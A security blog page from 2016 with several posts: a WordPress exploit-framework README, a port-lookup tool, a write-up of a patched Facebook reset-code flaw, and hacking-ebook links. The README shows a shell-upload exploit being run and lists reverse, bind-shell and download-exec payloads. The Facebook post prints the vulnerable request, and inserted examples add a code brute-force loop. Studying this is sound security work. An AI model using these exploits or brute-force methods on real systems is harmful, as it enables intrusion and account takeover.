SECURITY EDUCATION, PRIVACY GUIDANCE, THREAT AWARENESS, OPEN SOURCE TOOLS, RESEARCH NOTES, AND RESPONSIBLE TECHNOLOGY CONTENT


Thursday, March 10, 2016

A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems - Wordpress-Exploit-Framework




A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.


What do I need to run it?

Ensure that you have Ruby 2.2.x installed on your system, then install all required dependencies by opening a command prompt / terminal in the WPXF folder and running bundle install.
If bundler is not present on your system, you can install it by running gem install bundler.

How do I use it?

Open a command prompt / terminal in the directory you downloaded WordPress Exploit Framework to, and start it by running ruby wpxf.rb.
Once loaded, you'll be presented with the wpxf prompt; from here you can search for modules using the search command or load a module using the use command.
Loading a module into your environment allows you to set its options with the set command and view information about the module with info.
Below is an example of how one would load the symposium_shell_upload exploit module, set the module and payload options, and run the exploit against the target.


wpxf > use exploit/symposium_shell_upload
[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>

wpxf [exploit/symposium_shell_upload] > set host wp-sandbox
[+] Set host => wp-sandbox

wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/
[+] Set target_uri => /wordpress/

wpxf [exploit/symposium_shell_upload] > set payload exec
[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>

wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"
[+] Set cmd => echo "Hello, world!"

wpxf [exploit/symposium_shell_upload] > run
[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully


For a full list of supported commands, take a look at the project wiki.

What is the difference between auxiliary and exploit modules?

Auxiliary modules do not run payloads on the target machine; instead they extract information from the target, escalate privileges or provide denial-of-service functionality.
Exploit modules require you to specify a payload, which is then executed on the target machine, letting you run arbitrary code to extract information, establish a remote shell or do anything else you want within the context of the web server.

What payloads are available?
  • bind_php: uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
  • custom: uploads and executes a custom PHP script.
  • download_exec: downloads and runs a remote executable file.
  • exec: runs a shell command on the remote server and returns the output to the WPXF session.
  • reverse_tcp: uploads a script that will establish a reverse TCP shell.
All these payloads, with the exception of custom, delete themselves after they have been executed, to avoid leaving them lying around on the target machine after use or in the event that a shell they are being used to establish fails. A custom payload does not clean up after itself, so remove it by hand once you are done.

How can I write my own modules and payloads?


Guides on writing modules and payloads can be found on the project wiki, and full documentation of the API can be found at http://www.getwpxf.com/doc .




A Command To Search Port Names And Numbers - Whatportis



It often happens that we need to find the default port number for a specific service, or which service normally listens on a given port.


Usage

This tool allows you to find what port is associated with a service:


$ whatportis redis
+-------+------+----------+---------------------------------------+
| Name  | Port | Protocol | Description                           |
+-------+------+----------+---------------------------------------+
| redis | 6379 | tcp      | An advanced key-value cache and store |
+-------+------+----------+---------------------------------------+

Or, conversely, what service is associated with a port number:

$ whatportis 5432
+------------+------+----------+---------------------+
| Name       | Port | Protocol | Description         |
+------------+------+----------+---------------------+
| postgresql | 5432 | tcp      | PostgreSQL Database |
| postgresql | 5432 | udp      | PostgreSQL Database |
+------------+------+----------+---------------------+

You can also search a pattern without knowing the exact name by adding the --like option:

$ whatportis mysql --like
+----------------+-------+----------+-----------------------------------+
| Name           | Port  | Protocol | Description                       |
+----------------+-------+----------+-----------------------------------+
| mysql-cluster  | 1186  | tcp      | MySQL Cluster Manager             |
| mysql-cluster  | 1186  | udp      | MySQL Cluster Manager             |
| mysql-cm-agent | 1862  | tcp      | MySQL Cluster Manager Agent       |
| mysql-cm-agent | 1862  | udp      | MySQL Cluster Manager Agent       |
| mysql-im       | 2273  | tcp      | MySQL Instance Manager            |
| mysql-im       | 2273  | udp      | MySQL Instance Manager            |
| mysql          | 3306  | tcp      | MySQL                             |
| mysql          | 3306  | udp      | MySQL                             |
| mysql-proxy    | 6446  | tcp      | MySQL Proxy                       |
| mysql-proxy    | 6446  | udp      | MySQL Proxy                       |
| mysqlx         | 33060 | tcp      | MySQL Database Extended Interface |
+----------------+-------+----------+-----------------------------------+


Installation


$ pip install whatportis


JSON output


You can display the results as JSON using the --json option:


$ whatportis 5432 --json
[
{
"description": "PostgreSQL Database",
"protocol": "tcp",
"name": "postgresql",
"port": "5432"
},
{
"description": "PostgreSQL Database",
"protocol": "udp",
"name": "postgresql",
"port": "5432"
}
]


REST API


Whatportis can also be started as a RESTful API server:



$ whatportis --server localhost 8080
* Running on http://localhost:8080/ (Press CTRL+C to quit)

$ curl http://localhost:8080/ports
{
"ports": [
{
"description": "Description",
"name": "Service Name",
"port": "Port Number",
"protocol": "Transport Protocol"
},
...
]
}


$ curl http://localhost:8080/ports/3306
{
"ports": [
[
"mysql",
"3306",
"tcp",
"MySQL"
],
[
"mysql",
"3306",
"udp",
"MySQL"
]
]
}

$ curl "http://localhost:8080/ports/mysql?like"
{
"ports": [
[
"mysql-cluster",
"1186",
"tcp",
"MySQL Cluster Manager"
],
[
"mysql-cluster",
"1186",
"udp",
"MySQL Cluster Manager"
],
...
}


Notes

  • "Why not use grep <port> /etc/services " ? Simply because I want a portable command that display the output in a nice format (a pretty table).
  • The tool uses the Iana.org website to get the official list of ports. A private script has been created to fetch regularly the website and update the ports.json file. For this reason, an update command will be created in a future version.
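The usage section above shows three kinds of query (exact service name, port number, and --like substring search) and the first note explains why whatportis does not simply grep /etc/services. As an added example, not whatportis's own code, the following Python script performs the same three lookups over data in /etc/services format (name, port/protocol, optional aliases, # comment), which is the format that grep would read, and emits JSON shaped like whatportis --json. The sample entries are constructed for this example and stand in for the full IANA registry whatportis ships as ports.json; one difference from the tool is that the port is kept as an integer rather than a string.

```python
"""Added example, not part of whatportis: a small lookup over data in the
/etc/services format (name, port/protocol, optional aliases, # comment),
with exact matching on a port number or service name, substring matching
for a --like-style search, and JSON output."""
import json
import re

# Constructed sample in /etc/services format: a few lines standing in for the
# registry whatportis ships as ports.json.
SAMPLE_SERVICES = """\
# service-name   port/protocol   [aliases ...]   # description
ssh              22/tcp                          # SSH Remote Login Protocol
mysql            3306/tcp                        # MySQL
mysql            3306/udp                        # MySQL
mysql-proxy      6446/tcp                        # MySQL Proxy
redis            6379/tcp                        # An advanced key-value cache and store
postgresql       5432/tcp        postgres        # PostgreSQL Database
postgresql       5432/udp        postgres        # PostgreSQL Database
"""

_LINE = re.compile(
    r"^(?P<name>[^\s#]+)\s+(?P<port>\d+)/(?P<proto>\w+)"
    r"(?P<aliases>(?:\s+[^\s#]+)*)\s*(?:#\s*(?P<desc>.*))?$"
)


def parse_services(text):
    """Parse /etc/services-style text into a list of entry dicts.

    Blank lines, comment lines and lines that do not fit the format are
    skipped, so one broken line cannot take the whole lookup down."""
    entries = []
    for raw in text.splitlines():
        m = _LINE.match(raw.strip())
        if not m:
            continue
        entries.append({
            "name": m.group("name"),
            "port": int(m.group("port")),
            "protocol": m.group("proto"),
            "aliases": m.group("aliases").split(),
            "description": (m.group("desc") or "").strip(),
        })
    return entries


def lookup(entries, query, like=False):
    """Digits match a port exactly; otherwise match the name (or an alias)
    exactly, or any name containing the query when like=True."""
    q = query.strip().lower()
    if q.isdigit():
        hits = [e for e in entries if e["port"] == int(q)]
    elif like:
        hits = [e for e in entries if q in e["name"].lower()]
    else:
        hits = [e for e in entries
                if e["name"].lower() == q
                or q in [a.lower() for a in e["aliases"]]]
    return sorted(hits, key=lambda e: (e["port"], e["protocol"]))


def lookup_json(entries, query, like=False):
    """JSON in the shape of `whatportis --json` (port kept as an integer here)."""
    return json.dumps(
        [{k: e[k] for k in ("name", "port", "protocol", "description")}
         for e in lookup(entries, query, like)],
        indent=2,
    )


if __name__ == "__main__":
    services = parse_services(SAMPLE_SERVICES)
    print(lookup_json(services, "5432"))
    print(lookup_json(services, "mysql", like=True))
```

To run it against a real system file instead of the sample, pass the contents of /etc/services to parse_services; alias matching (postgres resolving to postgresql) is something the grep approach only gets by accident.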




Monday, March 7, 2016

Facebook Password reset vulnerability allowed hackers to hijack any FB account



Hacking Facebook is one of the most searched-for queries on Google, because a lot of Facebook accounts are valuable: valuable enough that security researchers spend their time and resources hunting for vulnerabilities in Facebook in search of a big break. One such researcher, Anand Prakash, has hit the jackpot. He found a critical vulnerability in Facebook which could have allowed him to take over any Facebook account with almost no effort.

The vulnerability Prakash found lies in the way Facebook's beta sites handle 'Forgot Password' requests. Normally, when you forget your password, Facebook offers to get you back into your account through the 'Forgot Password' option, which sends a six-digit code to your phone number or email address. After you enter this code, you are let back into your account and can reset your password.

Prakash set out to test this mechanism. He tried to brute-force the six-digit code in the 'Forgot Password' window, but because Facebook limits the number of attempts to 12, he was locked out after 12 attempts and got nowhere.

He then turned his attention to Facebook's beta sites, beta.facebook.com and mbasic.beta.facebook.com, and found that the same forgot-password endpoints there had no rate limit at all. With no limit on attempts, nothing stopped him from brute-forcing the code for any Facebook account: a six-digit code has only 1,000,000 possible values.

Vulnerable request:


POST /recover/as/code/ HTTP/1.1
Host: beta.facebook.com

lsd=AVoywo13&n=XXXXX


Brute-forcing the value of "n" allowed Prakash to set a new password for any Facebook user.
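The whole finding comes down to one missing control: the main site capped guesses at 12 per reset, the beta endpoints did not. As an added example, not code from the article or from Facebook, the following Python model shows the difference. A ResetCodeService issues a six-digit code per account and checks guesses; max_attempts=12 models the limit on the main site and max_attempts=None models the beta endpoints. brute_force is the attacker's loop. Everything is in memory; the account name, the code=… test hook and the class and function names are constructed for this example.

```python
"""Added example, not code from the article or from Facebook: an in-memory
model of a six-digit password-reset code check, with and without the
per-account attempt limit the article describes, plus the brute-force loop
an attacker would run against the unlimited variant. Nothing here talks to
a network; the service, account names and codes are all constructed."""
import secrets

CODE_DIGITS = 6
CODE_SPACE = 10 ** CODE_DIGITS   # 1,000,000 possible six-digit codes


class ResetCodeService:
    """Issues one reset code per account and checks guesses against it.

    max_attempts=None models the beta endpoints with no rate limit;
    max_attempts=12 models the limit enforced on the main site.
    """

    def __init__(self, max_attempts=None):
        self.max_attempts = max_attempts
        self._codes = {}       # account -> outstanding code
        self._attempts = {}    # account -> failed guesses so far

    def request_reset(self, account, code=None):
        """Issue a fresh code. `code` is a test hook only; a real code is random."""
        if code is None:
            code = f"{secrets.randbelow(CODE_SPACE):0{CODE_DIGITS}d}"
        self._codes[account] = code
        self._attempts[account] = 0
        return code  # would go out of band (SMS/email); returned for the demo

    def _locked(self, account):
        return (self.max_attempts is not None
                and self._attempts.get(account, 0) >= self.max_attempts)

    def verify(self, account, guess):
        """Return 'ok', 'wrong' or 'locked'."""
        if self._locked(account):
            return "locked"
        expected = self._codes.get(account)
        if expected is None:
            return "wrong"
        if secrets.compare_digest(expected, guess):
            del self._codes[account]   # codes are single-use
            return "ok"
        self._attempts[account] += 1
        if self._locked(account):
            del self._codes[account]   # lockout also invalidates the code
            return "locked"
        return "wrong"


def brute_force(service, account):
    """Guess every code in order. Returns (code, attempts) on success,
    (None, attempts) if the service locks the account first."""
    attempts = 0
    for n in range(CODE_SPACE):
        guess = f"{n:0{CODE_DIGITS}d}"
        attempts += 1
        result = service.verify(account, guess)
        if result == "ok":
            return guess, attempts
        if result == "locked":
            return None, attempts
    return None, attempts


if __name__ == "__main__":
    for limit in (None, 12):
        svc = ResetCodeService(max_attempts=limit)
        real = svc.request_reset("victim@example.com")
        found, tries = brute_force(svc, "victim@example.com")
        print(f"limit={limit}: real code {real}, found {found} after {tries} attempts")
```

Against the unlimited service the loop always finds the code (on average after about 500,000 guesses, which is trivial over HTTP); against the limited one it gets 12 guesses, a 12 in 1,000,000 chance per reset, and the lockout also invalidates the code so a fresh reset is needed. The check to carry over to your own reset flows is that the limit is enforced on every host and path that serves the endpoint, not just the primary one.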

Video of the proof of concept (embedded in the original post).

Prakash reported the issue to Facebook's security team on 22 February 2016. Facebook acknowledged the severity of the vulnerability immediately and shipped a fix on 23 February. It also awarded Prakash a bug bounty of $15,000, one of the higher bounties the social network has paid.




By OffensiveSec

Sunday, March 6, 2016

Directory of various materials for studying hacking




Note: I am not responsible for what you do with these hacking materials; responsibility for their use lies with the student.

A directory of various materials for studying hacking, reverse engineering, malware, pentest tools, etc.

By OffensiveSec


Hacking Ebooks ++ VI



Best Hacking eBooks 2016. Many teenagers want to become a "hacker", but it is not an easy task: hackers combine programming skills in several languages with the sharp eye needed to find vulnerabilities in websites, software and other applications. If you want to become a hacker you need to spend much of your time at the computer learning new technologies and reading books on hacking that can help you become an ethical hacker. Read the books carefully first, then practise what they teach, for educational purposes only and never against systems you are not authorised to test.


Hacking Ebooks ++ V

Hacking Ebooks ++ IV

Hacking Ebooks ++ III

Hacking Ebooks ++ II

Offensive Sec Blog has been sharing security research, hacking tools, threat intelligence, and offensive security content since 2015.
Copyright © OffSec Blog | Powered by OffensiveSec
Design by OffSec | Built for the security community